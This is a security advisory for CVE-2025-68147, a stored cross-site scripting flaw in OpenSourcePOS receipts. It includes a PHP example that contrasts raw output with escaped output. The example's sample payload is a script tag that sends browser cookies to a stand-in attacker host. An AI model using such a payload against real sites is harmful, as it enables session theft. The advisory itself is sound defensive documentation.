Stored Cross-Site Scripting Vulnerability in Open Source Point of Sale by OpenSourcePOS
CVE-2025-68147

8.1 HIGH

Key Information:

Vendor: OpenSourcePOS
CVE Published: 17 December 2025

What is CVE-2025-68147?

Open Source Point of Sale (OSPOS) stores the text entered in the 'Return Policy' configuration field and later renders it into receipts without escaping it. A user who can edit that field (an administrator-level account, consistent with the CVSS 'Privileges Required: High') can therefore store HTML that carries JavaScript. Whenever another user, including other administrators and sales staff, views a receipt or completes a transaction that renders the field, the stored script runs in that user's browser under their session, which enables session hijacking and actions performed on the victim's behalf. Version 3.4.2 fixes the issue by escaping the field on output. Until the upgrade is applied the only mitigation is procedural: keep the 'Return Policy' field plain text with no HTML tags and limit configuration access to trusted administrators, since the affected versions offer no code-level workaround.
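The following is an added illustration, not code from the OSPOS project, of the defect the advisory describes and of the output-escaping fix it credits to 3.4.2. The receipt-footer functions, the `SAMPLE_POLICY` payload and the plain-text check are assumptions constructed for this example; OSPOS's real template and setting names are not shown here.

```php
<?php
// Added example, not OSPOS code. Run with: php -d zend.assertions=1 example.php
// Assumption: the stored 'Return Policy' setting is interpolated into the
// receipt footer as HTML text. Requires PHP 8 (str_contains).
declare(strict_types=1);

// Constructed sample of what a user with config-edit rights could store.
const SAMPLE_POLICY = 'Returns accepted within 30 days.'
    . '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Vulnerable pattern: raw interpolation of the stored setting into markup.
function render_footer_vulnerable(string $returnPolicy): string
{
    return "<div class=\"footer\">{$returnPolicy}</div>";
}

// Hardened pattern: escape for the HTML text-node context at output time.
function render_footer_escaped(string $returnPolicy): string
{
    $safe = htmlspecialchars($returnPolicy, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class=\"footer\">{$safe}</div>";
}

// Interim workaround for affected versions, enforced at save time: refuse any
// value that contains markup so the field stays plain text.
function policy_is_plain_text(string $value): bool
{
    return $value === strip_tags($value) && !preg_match('/[<>]/', $value);
}

$vulnerable = render_footer_vulnerable(SAMPLE_POLICY);
$escaped    = render_footer_escaped(SAMPLE_POLICY);

assert(str_contains($vulnerable, '<script>'));   // tag reaches the browser intact
assert(!str_contains($escaped, '<script>'));     // rendered as inert text
assert(str_contains($escaped, '&lt;script&gt;'));
assert(policy_is_plain_text('Returns accepted within 30 days.'));
assert(!policy_is_plain_text(SAMPLE_POLICY));

echo $escaped, PHP_EOL;
```

`htmlspecialchars` with `ENT_QUOTES` is the correct escaper only for an HTML text node or a quoted attribute value; a setting that is ever emitted inside a `<script>` block, a URL or an inline event handler needs the escaper for that context instead, so the fix must be applied at every place the field is printed, not just the receipt footer.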

Affected Version(s)

opensourcepos >= 3.4.0, < 3.4.2

References

CVSS V3.1

Score: 8.1
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: Required
Scope: Changed

Timeline

  • Vulnerability published: 17 December 2025

  • Vulnerability reserved
